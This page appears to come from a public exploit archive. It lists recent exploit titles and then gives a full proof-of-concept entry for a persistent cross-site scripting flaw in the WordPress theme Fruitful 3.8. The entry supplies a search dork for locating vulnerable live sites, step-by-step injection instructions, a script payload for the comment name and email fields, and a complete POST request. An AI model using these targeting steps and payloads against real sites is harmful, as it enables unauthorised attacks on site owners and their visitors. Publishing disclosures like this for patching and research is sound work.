
15 changes to exploits/shellcodes HP System Event 1.2.9.0 - 'HPWMISVC' Unquoted Service Path BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path Cuckoo Clock v5.0 - Buffer Overflow Anviz CrossChex - Buffer Overflow (Metasploit) SOPlanning 1.45 - 'by' SQL Injection Wordpress Plugin Strong Testimonials 2.40.1 - Persistent Cross-Site Scripting Avaya Aura Communication Manager 5.2 - Remote Code Execution Ice HRM 26.2.0 - Cross-Site Request Forgery (Add User) WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting SOPlanning 1.45 - Cross-Site Request Forgery (Add User) SOPlanning 1.45 - 'users' SQL Injection LabVantage 8.3 - Information Disclosure
25 lines
No EOL
1.2 KiB
Text
25 lines
No EOL
1.2 KiB
Text
# Exploit Title: WordPress Theme Fruitful 3.8 - Persistent Cross-Site Scripting
|
|
# Dork: intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
|
|
# Date: 2020-02-14
|
|
# Category : Webapps
|
|
# Software Link: https://downloads.wordpress.org/theme/fruitful.3.8.zip
|
|
# Vendor Homepage: https://github.com/Fruitfulcode/Fruitful
|
|
# Exploit Author: Ultra Security Team (Ashkan Moghaddas , AmirMohammad Safari)
|
|
# Team Members: Behzad Khalifeh , Milad Ranjbar
|
|
# Version: 3.8
|
|
# Tested on: Windows/Linux
|
|
# CVE: N/A
|
|
|
|
.:: Theme Description ::.
|
|
Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.
|
|
|
|
.:: Proof Of Concept (PoC) ::.
|
|
Step 1 - Find Your Target With above Dork.
|
|
Step 2 - Inject Your Java Script Codes to Name & Email Fields
|
|
Step 3 - Click Post Comment
|
|
|
|
.:: Tested Payload ::.
|
|
'>"><script>alert(/XSS By UltraSecurity/)</script>
|
|
|
|
.:: Post Request ::.
|
|
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145 |